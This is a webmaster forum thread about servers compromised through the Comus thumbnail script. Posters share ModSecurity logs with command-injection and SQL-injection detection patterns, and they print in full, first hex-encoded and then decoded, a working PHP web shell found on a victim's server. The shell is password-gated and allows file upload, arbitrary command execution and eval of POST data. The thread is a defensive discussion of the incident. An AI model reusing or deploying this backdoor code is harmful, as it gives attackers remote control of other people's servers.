Attn: Comus hack victim. - Warning!

[HEAT]

Did you make sure you install mod_security to your server?

I had the same CT hack and had it resolved by installing it.
After resolving issue, I first thought it was trojan hack that sniffs ftp password from local machine. but it wasn't.

Hacker had installed phpshell backdoor(something like r57shell, c99shell etc.) somewhere in server and I'm sure it came from security holes of CT. Once it has installed, it will executed independently so removing ct won't help.
The bad shell scans your websites to find weak php/html files. After it finds target files, it injects the code every 2 minutes.

I found many mod_security warnings from /var/log/httpd/error_log

Quote:

[Sun Sep 19 11:19:16 2009] [error] [client 64.255.180.23] ModSecurity: Access denied with code 501 (phase 2). Pattern match "(?:\\b(??:n(?:et(?:\\b\\W+?\\blocalgroup|\\.exe )|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe |clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo \\b\\W*?\\by+)\\b|c(?:md(??:32)?\\.exe\\b|\\b\\W *?\\/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[\\;\\|\\`]\\W*? ..." at REQUEST_HEADERS:User-Agent. [file "/etc/httpd/modsecurity.d/modsecurity_crs_40_generic_attacks.conf"] [line "140"] [id "959006"] [msg "System Command Injection"] [data "; id"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [hostname "www.domain.com"] [uri "/free-sex-movie/download-free-sex-movies.html"] [unique_id "43hs@0xMEtMAACAuMFgAAAAz"]
[Sun Sep 19 11:19:16 2009] [notice] child pid 8238 exit signal Segmentation fault (11)

and I found this page in my server
http://www.fuxyvids.com/vid/86/vgoJ6...vgoJ6xWBzS.php
(hacker's backdoor??)

Source looks like this.

Quote:

<?php $s="696620287374726C656E28245F504F53545B6363635D29 3D3D30297B69662028245F504F53545B706173735D213D2731 323327297B6563686F20273C68746D6C3E3C626F6479206267 636F6C6F723D23424246464242206F6E6C6F61643D22646F63 756D656E742E6D79662E706173732E666F63757328293B223E 3C666F726D206D6574686F643D504F53543E3C696E70757420 6E616D653D706173733E3C2F666F726D3E3C2F626F64793E3C 2F68746D6C3E273B6578697428293B7D6563686F20273C6874 6D6C3E3C626F6479206267636F6C6F723D2342424646424220 6F6E6C6F61643D22646F63756D656E742E6D79662E63632E66 6F63757328293B223E273B6563686F20273C666F726D206E61 6D653D6D7966206D6574686F643D504F535420656E63747970 653D226D756C7469706172742F666F726D2D64617461223E3C 696E70757420747970653D68696464656E206E616D653D7061 73732076616C75653D272E245F504F53545B706173735D2E27 3E3C696E70757420747970653D66696C65206E616D653D7570 66696C653E3C696E707574206E616D653D6E65776E616D653E 3C696E70757420747970653D7375626D69743E3C62723E273B 6563686F20273C696E707574206E616D653D63632073697A65 3D37332076616C75653D22272E7374726970736C6173686573 28245F504F53545B63635D292E27223E3C2F666F726D3E273B 6563686F20273C7072653E273B20696620286D6F76655F7570 6C6F616465645F66696C6528245F46494C45535B2775706669 6C65275D5B27746D705F6E616D65275D2C20245F504F53545B 6E65776E616D655D2929207B202F2A6563686F202253656E74 2E3C62723E5C6E223B2A2F207D69662028245F504F53545B6D 66696C655D29207B2020202466703D666F70656E28245F504F 53545B6E65776E616D655D2C277727293B202020666F722824 6B3D303B20246B3C7374726C656E28245F504F53545B6D6669 6C655D293B20246B2B3D322920207B20202020246363203D20 73756273747228245F504F53545B6D66696C655D2C246B2C32 293B20202020246363203D20273078272E2463633B20202020 20202020246363203D20726F756E6428246363293B20202020 246363203D2063687228246363293B20202020667772697465 282466702C246363293B2020207D202066636C6F7365282466 70293B207D24636F3D7374726970736C617368657328245F50 4F53545B63635D293B20246F7574203D2027273B6966286675 6E6374696F6E5F6578697374732827657865632729297B6578 65632824636F2C246F7574293B246F7574203D206A6F696E28 225C6E222C246F7574293B7D656C736569662866756E637469 6F6E5F657869737473282770617373746872752729297B6F62 5F737461727428293B70617373746872752824636F293B246F 7574203D206F625F6765745F636F6E74656E747328293B6F62 5F656E645F636C65616E28293B7D656C736569662866756E63 74696F6E5F657869737473282773797374656D2729297B6F62 5F737461727428293B73797374656D2824636F293B246F7574 203D206F625F6765745F636F6E74656E747328293B6F625F65 6E645F636C65616E28293B7D656C736569662866756E637469 6F6E5F65786973747328277368656C6C5F657865632729297B 246F7574203D207368656C6C5F657865632824636F293B7D65 6C736569662869735F7265736F75726365282466203D20706F 70656E2824636F2C2272222929297B246F7574203D2022223B 7768696C6528214066656F662824662929207B20246F757420 2E3D2066726561642824662C31303234293B7D70636C6F7365 282466293B7D656C7365207B246F75743D276578206661696C 6564273B7D6563686F20246F75743B6563686F20273C2F7072 653E273B6563686F20273C2F626F64793E3C2F68746D6C3E27 3B7D20656C7365207B6966286765745F6D616769635F71756F 7465735F6770632829297B6576616C287374726970736C6173 68657328245F504F53545B6363635D29293B7D20656C736520 7B6576616C28245F504F53545B6363635D293B7D7D";$sss=" ";for($k=0;$k<strlen($s);$k+=2){$ss=chr(("0x".subs tr($s,$k,2))+0);$sss.=$ss;}eval($sss);$ssss="***** *************************************";?>

and warning error log

Quote:

[Sun Sep 20 11:00:33 2009] [error] [client 122.70.145.151] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "48"] [id "960009"] [msg "Request Missing a User Agent Header"] [severity "WARNING"] [tag "PROTOCOL_VIOLATION/MISSING_HEADER"] [hostname "fuxyvids.com"] [uri "/vid/86/vgoJ6xWBzS/vgoJ6xWBzS.php"] [unique_id "oF4EtExMEtMAABs4u8sAAAA2"]
[Sun Sep 20 11:00:33 2009] [error] [client 122.70.145.151] ModSecurity: Warning. Pattern match "\\b(??:s(?:ys(???:process|tabl)e|filegroup| object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubst r(?:ing)?)|user_(???:constrain|objec)t|tab(?:_ column|le)|ind_column|user)s|password|group)|a(?:t t(?:rel|typ)id|ll_objects)|object_(??:nam|typ)e| id)| ..." at ARGS:ccc. [file "/etc/httpd/modsecurity.d/modsecurity_crs_40_generic_attacks.conf"] [line "54"] [id "950904"] [msg "Blind SQL Injection Attack"] [data "substr"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"] [hostname "fuxyvids.com"] [uri "/vid/86/vgoJ6xWBzS/vgoJ6xWBzS.php"] [unique_id "oF4EtExMEtMAABs4u8sAAAA2"]
[Sun Sep 20 11:00:33 2009] [error] [client 122.70.145.151] ModSecurity: Access denied with code 501 (phase 2). Pattern match "(?:\\b(??:n(?:et(?:\\b\\W+?\\blocalgroup|\\.exe )|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe |clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo \\b\\W*?\\by+)\\b|c(?:md(??:32)?\\.exe\\b|\\b\\W *?\\/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[\\;\\|\\`]\\W*? ..." at ARGS:ccc. [file "/etc/httpd/modsecurity.d/modsecurity_crs_40_generic_attacks.conf"] [line "133"] [id "950006"] [msg "System Command Injection"] [data ";\\x0a echo"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [hostname "fuxyvids.com"] [uri "/vid/86/vgoJ6xWBzS/vgoJ6xWBzS.php"] [unique_id "oF4EtExMEtMAABs4u8sAAAA2"]
[Sun Sep 20 11:00:34 2009] [notice] child pid 6968 exit signal Segmentation fault (11)

So actually, my sever still got owned by hacker. they will find another hole from other weak scripts such as WP and tube scripts using mysql.
Code is stopped but I need to fix this shit by the root. Thankfully I have clean backup and gonna move to another managed host.

If you're still getting js attack, ask you host to install mod_security. it will stop code anyway... then watch your error log and delete all php backdoors. at least you can make clean backup...

[pornmasta]

in html it gives this:

Code:

if (strlen($_POST[ccc])==0){if ($_POST[pass]!='123'){echo '<html><body bgcolor=#BBFFBB onload="document.myf.pass.focus();"><form method=POST><input name=pass></form></body></html>';exit();}echo '<html><body bgcolor=#BBFFBB onload="document.myf.cc.focus();">';echo '<form name=myf method=POST enctype="multipart/form-data"><input type=hidden name=pass value='.$_POST[pass].'><input type=file name=upfile><input name=newname><input type=submit><br>';echo '<input name=cc size=73 value="'.stripslashes($_POST[cc]).'"></form>';echo '<pre>'; if (move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST[newname])) { /*echo "Sent.<br>\n";*/ }if ($_POST[mfile]) {   $fp=fopen($_POST[newname],'w');   for($k=0; $k<strlen($_POST[mfile]); $k+=2)  {    $cc = substr($_POST[mfile],$k,2);    $cc = '0x'.$cc;        $cc = round($cc);    $cc = chr($cc);    fwrite($fp,$cc);   }  fclose($fp); }$co=stripslashes($_POST[cc]); $out = '';if(function_exists('exec')){exec($co,$out);$out = join("\n",$out);}elseif(function_exists('passthru')){ob_start();passthru($co);$out = ob_get_contents();ob_end_clean();}elseif(function_exists('system')){ob_start();system($co);$out = ob_get_contents();ob_end_clean();}elseif(function_exists('shell_exec')){$out = shell_exec($co);}elseif(is_resource($f = popen($co,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);}pclose($f);}else {$out='ex failed';}echo $out;echo '</pre>';echo '</body></html>';} else {if(get_magic_quotes_gpc()){eval(stripslashes($_POST[ccc]));} else {eval($_POST[ccc]);}}

[brassmonkey]

damn he fucked you hope you got dinner first j/k hahaha thats fucked up shit

[Klen]

I did installed some nasty mod security settings and i got 268 mails about various errors and injections attempts.There are some other solutions on adx forum.

[boneless]

Quote:

Originally Posted by KlenTelaris

I did installed some nasty mod security settings and i got 268 mails about various errors and injections attempts.There are some other solutions on adx forum.

i psoted yellowfibers findings in the comus thumbs.com site down topic on this board.

[Davy]

Hmm, maybe the people who ran an icq chat on my server about 2 years ago did get in via comus afterall.
Spiked my bandwidth up to over $1000 in overages. Luckily, my host waived the overages.